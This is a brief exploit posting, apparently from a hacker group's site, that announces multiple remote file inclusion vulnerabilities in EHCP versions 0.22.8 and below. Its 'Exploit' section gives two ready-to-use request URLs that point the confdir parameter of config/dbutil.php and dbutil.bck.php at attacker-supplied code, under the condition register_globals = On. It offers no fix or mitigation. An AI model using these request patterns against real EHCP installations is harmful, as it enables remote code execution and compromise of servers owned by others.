EHCP versions 0.22.8 and below suffer from multiple remote file inclusion vulnerabilities.
83fab2b77c909841eeea18b645cca3c219a8cf5b1727a7f2f54b050550cb4edc
---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------
Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org
---------------------------------------------------------------
Multiple Remote File Inclusion
---------------------------------------------------------------
# Author: MhZ91 nobody.91@hotmail.it
# Download Script: http://sourceforge.net/projects/ehcp
# register_globals = On
# Exploit
# http://[site]/[path]/config/dbutil.bck.php?confdir=[Evil_Code]
# http://[site]/[path]/config/dbutil.php?confdir=[Evil_Code]
---------------------------------------------------------------